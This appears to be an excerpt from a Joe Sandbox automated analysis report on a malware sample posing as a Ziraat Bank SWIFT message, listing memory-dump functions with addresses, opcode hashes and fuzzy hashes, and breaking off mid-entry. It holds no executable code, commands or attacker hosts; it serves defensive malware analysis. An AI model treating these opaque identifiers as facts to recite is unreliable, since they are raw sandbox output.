                                                                          • Snapshot File: hcaresult_0_2_247d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8121490e17fbf54dfd3fa9965958f793a09bb086efacf6e6fd2383ea6f7f3724
                                                                          • Instruction ID: a9c4f9227736277084084c1d41788603885f56a8475078f8b20b237c1a39be95
                                                                          • Opcode Fuzzy Hash: 8121490e17fbf54dfd3fa9965958f793a09bb086efacf6e6fd2383ea6f7f3724
                                                                          • Instruction Fuzzy Hash: 802100B1A14200EFDB11DF14C9C0B66BBA5FF98314F24C9AAE80A4F342C336D447CA61
                                                                          Function 0247D01C Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095151117.000000000247D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0247D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_247d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb4e2dea187485f3bebc1b92c1bffdea8c074137eef622657878911109722967
                                                                          • Instruction ID: 519b746e4b002c8b7c84a319f58da4b9941c92fc4a0108e1b2eccc173cef1980
                                                                          • Opcode Fuzzy Hash: cb4e2dea187485f3bebc1b92c1bffdea8c074137eef622657878911109722967
                                                                          • Instruction Fuzzy Hash: 86212275A04280DFDB14DF24D9C0B66BFA5EF84318F24C56ED80A0B346C33AD447CAA1
                                                                          Function 0247D006 Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095151117.000000000247D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0247D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_247d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9699516974afdcc5ec6a1dc05989312ab2944ce7027aba284313eb3a7a2c67b5
                                                                          • Instruction ID: 4d59420ca5cd105dca3765d18cf5d87bb45e3fbf519f3573db6168dadaf00e85
                                                                          • Opcode Fuzzy Hash: 9699516974afdcc5ec6a1dc05989312ab2944ce7027aba284313eb3a7a2c67b5
                                                                          • Instruction Fuzzy Hash: 5F2160755093C08FCB02CF24D594755BF71EF46218F28C5DAD8498B667C33A940ACB62
                                                                          Function 0246D4BF Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095104891.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_246d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2daa2a363df402b9be9ec786f19577ca6fa2dccdb675a4d078ae3193046e083f
                                                                          • Instruction ID: 096211d4f38c653253457e8ec249f80aadc0d0db956360165442227316718a4e
                                                                          • Opcode Fuzzy Hash: 2daa2a363df402b9be9ec786f19577ca6fa2dccdb675a4d078ae3193046e083f
                                                                          • Instruction Fuzzy Hash: 6511D376904280CFCB16CF14D9C4B26BF71FB84318F24C6AAD8490B756C336D45ACBA2
                                                                          Function 0247D1CF Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095151117.000000000247D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0247D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_247d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 940b02a0978f1260169b41e4addd6cc2d084ad154835e3a44dc3b39ebcea2ae0
                                                                          • Instruction ID: 3eda03df73a86495c0c66f6c2cbd40e309eeeddc5b11c75133277da2bb53bfeb
                                                                          • Opcode Fuzzy Hash: 940b02a0978f1260169b41e4addd6cc2d084ad154835e3a44dc3b39ebcea2ae0
                                                                          • Instruction Fuzzy Hash: C711BB75904280DFCB12CF10C5C4B56BBA1FF84218F28C6AAD8494F396C33AD40ACB61
                                                                          Function 0246D745 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095104891.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_246d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 913ebaabcd8088e53c85d94e42c8b386d1c135b5d79515e89b4ab5524d3bab2b
                                                                          • Instruction ID: 4bab391a66413ad4c1b2f619d3e9bce7396f695985cbcb2eb6c760d35f55ef8f
                                                                          • Opcode Fuzzy Hash: 913ebaabcd8088e53c85d94e42c8b386d1c135b5d79515e89b4ab5524d3bab2b
                                                                          • Instruction Fuzzy Hash: 5001F771A04740DAE7215F15DD88B7BBFA8DF41325F08C92BED090A282D7799841CAB3
                                                                          Function 0246D744 Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095104891.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_246d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c07bda74a232db7882ce789b7462bafd875ff85642d33768f01889355c07fa0
                                                                          • Instruction ID: 4e609fb4596fe37f0eb3cde4878ab7592907e7a2a67e817b0bc4bf34ef2c7d09
                                                                          • Opcode Fuzzy Hash: 0c07bda74a232db7882ce789b7462bafd875ff85642d33768f01889355c07fa0
                                                                          • Instruction Fuzzy Hash: C5F0C2715043449EE7208F15D888B63FFA8EF41634F18C45BED084B286C3799844CAB2

                                                                          Non-executed Functions

                                                                          Function 0694A570 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: {#L
                                                                          • API String ID: 0-1361971085
                                                                          • Opcode ID: 8248ada973366334f6f529855076e38efbbd25de9e4775e7350ee0e60d62bbe2
                                                                          • Instruction ID: 6442e8d5328e41d71633d410786a3bfe37e2e927b932b3350698aa27655b8657
                                                                          • Opcode Fuzzy Hash: 8248ada973366334f6f529855076e38efbbd25de9e4775e7350ee0e60d62bbe2
                                                                          • Instruction Fuzzy Hash: CFD10471E05219DFDB58CFAAD68099EFBF2BB88300F14D52AD419AB228D7349942CF50
                                                                          Function 069418D9 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 98R
                                                                          • API String ID: 0-576591972
                                                                          • Opcode ID: 338855db5a5267d1fa2422eeffe72e1ec460e9fc942bd674ed6b9f1e9862e165
                                                                          • Instruction ID: b1b561dfdf6edef4f35b15bfb80ec4d15517b10af462af9a26a232015c9cff1a
                                                                          • Opcode Fuzzy Hash: 338855db5a5267d1fa2422eeffe72e1ec460e9fc942bd674ed6b9f1e9862e165
                                                                          • Instruction Fuzzy Hash: 987147B4E0420ADFDB48DF99D5819AEFBB1FF89310F14842AD414AB714D334AA82CF94
                                                                          Function 06948698 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: iUfo
                                                                          • API String ID: 0-3820436262
                                                                          • Opcode ID: 1a214719dcae8d6932028f22ac0c5a2bdfa867c250433ff25295e19d166fe04c
                                                                          • Instruction ID: ce41298df424ba9825d8abee1123f6e60e7e98da76761a7038ee648e1255d3bd
                                                                          • Opcode Fuzzy Hash: 1a214719dcae8d6932028f22ac0c5a2bdfa867c250433ff25295e19d166fe04c
                                                                          • Instruction Fuzzy Hash: 9C51D2B8E052199FDB48DFAAD584AAEBBF2FF88300F10942AD405B7754E73499418F94
                                                                          Function 06948688 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: iUfo
                                                                          • API String ID: 0-3820436262
                                                                          • Opcode ID: 8de3f31629a83dcdc7806505d6e83f4753cb14da2d501ad91a865027036ea7dd
                                                                          • Instruction ID: 7d873ed906cc3c7ccd5a0811cbae676ebb18c9e58c21ff4748d37f2eeccac2be
                                                                          • Opcode Fuzzy Hash: 8de3f31629a83dcdc7806505d6e83f4753cb14da2d501ad91a865027036ea7dd
                                                                          • Instruction Fuzzy Hash: D451E3B8E05219DFDB48CFAAD5846EDBBF2FF88300F14942AD505B7750E73899018B54
                                                                          Function 06941440 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: -2m
                                                                          • API String ID: 0-2686427999
                                                                          • Opcode ID: 4a29e386d200edd18e88b643be5abe378f387c33c7adf04b1452aecd138dddbe
                                                                          • Instruction ID: 8b279dc384cb8379891e9df53bac35fa9b3a4a295c21a84317bd5d3f5f552c6f
                                                                          • Opcode Fuzzy Hash: 4a29e386d200edd18e88b643be5abe378f387c33c7adf04b1452aecd138dddbe
                                                                          • Instruction Fuzzy Hash: 80513BB4E042198FDB48DFAAD540AEEFBF2FF88341F24D42AD419A7254D7349940CB64
                                                                          Function 06948A80 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: w7e^
                                                                          • API String ID: 0-1657886525
                                                                          • Opcode ID: ccbc74c455c654fe3cd636a9663745a0dbd01402f62842e3e9a1586aafd5bd87
                                                                          • Instruction ID: 56db28280ffec086373a828446fa1bdb13ae63a31562aa772cda2a0cb1ea5e4a
                                                                          • Opcode Fuzzy Hash: ccbc74c455c654fe3cd636a9663745a0dbd01402f62842e3e9a1586aafd5bd87
                                                                          • Instruction Fuzzy Hash: 414149B5D04209CFDB44DFA6C540AEEFBB1FF89210F14996AC016B7A54D7388A42CF58
                                                                          Function 06948A90 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: w7e^
                                                                          • API String ID: 0-1657886525
                                                                          • Opcode ID: a6636954e247679875c9b032f55fbafbc21cfa7e1a6970c72b6d736996c277a9
                                                                          • Instruction ID: 4ed70e6de289a9db9aaa1cb2f909bde5dc8553bf3fb78c7c79b7896af634cb60
                                                                          • Opcode Fuzzy Hash: a6636954e247679875c9b032f55fbafbc21cfa7e1a6970c72b6d736996c277a9
                                                                          • Instruction Fuzzy Hash: F74137B4D04209CFDF44DFAAC6409EEFBB1BF89210F14982AC416B7644D3788A42CF98
                                                                          Function 06945588 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0ni
                                                                          • API String ID: 0-1488673370
                                                                          • Opcode ID: f5299be09a446231a328676b137151dbdddd80f2c2db6db957bc795b11d4bf23
                                                                          • Instruction ID: f096fa45e9c5bc34e6130420edf111503fc36e3f2e2980ac07408f93d070ee6b
                                                                          • Opcode Fuzzy Hash: f5299be09a446231a328676b137151dbdddd80f2c2db6db957bc795b11d4bf23
                                                                          • Instruction Fuzzy Hash: E2514971E056188BDB68DF6B9D4479EFAF7BFC8200F14C1BA954CA6224EB340A858F51
                                                                          Function 0694557A Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0ni
                                                                          • API String ID: 0-1488673370
                                                                          • Opcode ID: d428b03bfa202ec24bbc599ba58db858cfa3b28a904d616a4c4e7b72ecb961a2
                                                                          • Instruction ID: e732ef94e7cc5372cc1949c4c337f5ed1a3325a6447c197350f446d6af87852d
                                                                          • Opcode Fuzzy Hash: d428b03bfa202ec24bbc599ba58db858cfa3b28a904d616a4c4e7b72ecb961a2
                                                                          • Instruction Fuzzy Hash: 52515A71E016188BDB68CF6B8D4478AFBF3BFC8300F14C1BA854CA6264EB3419858F51
                                                                          Function 04C50040 Relevance: .3, Instructions: 315COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2097481342.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4c50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: af1d7fe554e7fa306e3ed4ce06a9e9b365425589a6943eb9a3f587c432f26797
                                                                          • Instruction ID: 929b367b2cc7dffee3cb9c670f52986fd973f1810331575c44a24983b1523d4c
                                                                          • Opcode Fuzzy Hash: af1d7fe554e7fa306e3ed4ce06a9e9b365425589a6943eb9a3f587c432f26797
                                                                          • Instruction Fuzzy Hash: 0312C4B0C817458ED39ADF25E84C1893BB2B741319FD04B09D2612B2E5EBB4126EEF4C
                                                                          Function 024CD404 Relevance: .3, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095319907.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_24c0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0fb23420a38bd72e6ea309adbfd590767a735f876664957651e25dfe84c0aba
                                                                          • Instruction ID: ec848295e14dbc34e19b3af78eecc95f0ed69ab719c5cbddfad6048b493d305d
                                                                          • Opcode Fuzzy Hash: c0fb23420a38bd72e6ea309adbfd590767a735f876664957651e25dfe84c0aba
                                                                          • Instruction Fuzzy Hash: 9FA15C36E002058FCF46DFA9C84059EB7B3FF85304B26856FE805AB261DB75E95ACB40
                                                                          Function 06949FC8 Relevance: .3, Instructions: 254COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 034460c2316b446df98881dd2778d03eb85d618e874c26f2cecd50084c052567
                                                                          • Instruction ID: 987f770ea936b2c6101c0e3859c913a6da3f4f36a2645ebd9209b8be33911a3c
                                                                          • Opcode Fuzzy Hash: 034460c2316b446df98881dd2778d03eb85d618e874c26f2cecd50084c052567
                                                                          • Instruction Fuzzy Hash: A7B11971D45209DFDB58DFA6D98099EFBB2FF89300F20D42AD019AB654DB34AA02CF50
                                                                          Function 06949FBA Relevance: .2, Instructions: 250COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dee88d8721854ad6c543add50955394433dbc984c1d3854a062858a558aca68a
                                                                          • Instruction ID: 69de01a3100146d0d4f4360805d9eb637f4fe4b879b34973fe7d1bbfd5483e17
                                                                          • Opcode Fuzzy Hash: dee88d8721854ad6c543add50955394433dbc984c1d3854a062858a558aca68a
                                                                          • Instruction Fuzzy Hash: BDB11A75D45209DFDB58CFAAD98099EFBB2FF89300F20D42AD019A7254DB34AA02CF50
                                                                          Function 04C50006 Relevance: .2, Instructions: 241COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2097481342.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4c50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd68ffcfe6b4ce42882765d61acbd57837edda33d3f53e36a377d83a04da449f
                                                                          • Instruction ID: d6b4ef5f00e79e2da32d4bdb3ff4a726cc792718a45158425f2d8b177232dc43
                                                                          • Opcode Fuzzy Hash: dd68ffcfe6b4ce42882765d61acbd57837edda33d3f53e36a377d83a04da449f
                                                                          • Instruction Fuzzy Hash: F3C15BB0C807458FD79ADF24E8481897BB2FB85315FD04B09D1616B2E1EBB4166EEF48
                                                                          Function 06943CF8 Relevance: .2, Instructions: 198COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cc4022b8acf6d54f6bb24fc6ae876d629387f462418afd90a8de2395ee33f5c7
                                                                          • Instruction ID: 23be01c6e5c2400995474f9d32de8526e21acf66bd5ea8305cd09ecb468ea35a
                                                                          • Opcode Fuzzy Hash: cc4022b8acf6d54f6bb24fc6ae876d629387f462418afd90a8de2395ee33f5c7
                                                                          • Instruction Fuzzy Hash: 4A81F474E1521ADFDB44CFAAC98499EFBF1FF88210F248566D419AB620D330AE41CF95
                                                                          Function 06943D08 Relevance: .2, Instructions: 196COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d89276eab8e3d153232e1dec356730343675a422d6aa74e3677ab58a88c14330
                                                                          • Instruction ID: 6831cccd9d4b98fdbcac28fe838d12723f43d688db2b4d67df7ad0435b0e7c1c
                                                                          • Opcode Fuzzy Hash: d89276eab8e3d153232e1dec356730343675a422d6aa74e3677ab58a88c14330
                                                                          • Instruction Fuzzy Hash: 7791D374A1521ACFDB44CFAAC58499EFBF1FF88310F24955AD415AB620D330AE42CF95
                                                                          Function 06948E40 Relevance: .2, Instructions: 187COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e64ca332f7403af52da2a1a47a6e5f0d594399a17489a85332e59a6edcd3a7b0
                                                                          • Instruction ID: ed1bf1bfc6562a222417f68d3a4b0783c93a31fc3151312b77ce1f01e281ccf3
                                                                          • Opcode Fuzzy Hash: e64ca332f7403af52da2a1a47a6e5f0d594399a17489a85332e59a6edcd3a7b0
                                                                          • Instruction Fuzzy Hash: 7B813D74E012298FCB54DF69C580AAEFBB2FF89304F24D1A9D418A7715DB30AA41CF61
                                                                          Function 06945118 Relevance: .2, Instructions: 173COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b6bd22e5d27616e49a02e9fd006683949f792ac7e76dad5bd6c67a5ecec37f8
                                                                          • Instruction ID: e334e830809ed55698ab33539b161fe6ade6f96d6cb1a1c48762ef7e60aff8fa
                                                                          • Opcode Fuzzy Hash: 0b6bd22e5d27616e49a02e9fd006683949f792ac7e76dad5bd6c67a5ecec37f8
                                                                          • Instruction Fuzzy Hash: EF71F474E15609CFDB44DFA9C9809DEFBF2FF88310F25942AD415BB224E3349A428B64
                                                                          Function 06945108 Relevance: .2, Instructions: 173COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 33e285c424315410fde6f1e103d1b2b434b8ad4423a03d7e1a131e9f86b6ab40
                                                                          • Instruction ID: 6d4f0b60de430fd19408856bb71b385c52bc515f142203e1386162713cadb1cf
                                                                          • Opcode Fuzzy Hash: 33e285c424315410fde6f1e103d1b2b434b8ad4423a03d7e1a131e9f86b6ab40
                                                                          • Instruction Fuzzy Hash: 70711574E156098FDB44CFE9C9809DEFBF2FF8C210F25942AD405B7224E3349A428BA4
                                                                          Function 06945398 Relevance: .1, Instructions: 108COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4626ee3b303174d0f1fc872c4d9483779171508d014278cae384279777201dd0
                                                                          • Instruction ID: 0f33fe0248eca6586c61e780c6240e3a98917ca91d81c761128de4678f83a6e2
                                                                          • Opcode Fuzzy Hash: 4626ee3b303174d0f1fc872c4d9483779171508d014278cae384279777201dd0
                                                                          • Instruction Fuzzy Hash: 774128B1E0520ADFDB44DFE9C581AAEFBF2EF88300F24D46AC405A7614E7349A41CB94
                                                                          Function 069453A8 Relevance: .1, Instructions: 108COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5264335f1b2770383df6f88f611c7f823aff9294fd0eb3ab2a0b53f49cb2e409
                                                                          • Instruction ID: eeffbbce6ead8899dafe73df4fd83aac4409ade6a0aac8d34266c5d7a224a054
                                                                          • Opcode Fuzzy Hash: 5264335f1b2770383df6f88f611c7f823aff9294fd0eb3ab2a0b53f49cb2e409
                                                                          • Instruction Fuzzy Hash: EA4108B1E0520ADFDB44DFEAC581AAEFBF2EF88200F20D56AC505B7614D7349A41CB94
                                                                          Function 06948348 Relevance: .1, Instructions: 108COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 96f8028c3611906590e475cd8a4a2196b20b8e7c6c511e676862bc5b9805faa5
                                                                          • Instruction ID: 244ffe182f93abe4acbbb62b23003e0c605cc563307c42d073e17b76f0d0dbdc
                                                                          • Opcode Fuzzy Hash: 96f8028c3611906590e475cd8a4a2196b20b8e7c6c511e676862bc5b9805faa5
                                                                          • Instruction Fuzzy Hash: 86412B74E0560ADFDB44CFA6C641AAFFBF6EB88300F20D86AC105B7654E3749B418B95
                                                                          Function 06944F00 Relevance: .1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 260bb5e90d7368426439202bbe75afcd1db95e588a8a648c61c8f41fc212c63c
                                                                          • Instruction ID: b443679634322200674b30f82e3785be7b315af90430cfdf4fc62c72258a3ad1
                                                                          • Opcode Fuzzy Hash: 260bb5e90d7368426439202bbe75afcd1db95e588a8a648c61c8f41fc212c63c
                                                                          • Instruction Fuzzy Hash: 85410AB4E0520ADFDB44DFAAC481AAEFBF2EF88700F14C466D415A7654D3349A42CF94
                                                                          Function 06948358 Relevance: .1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
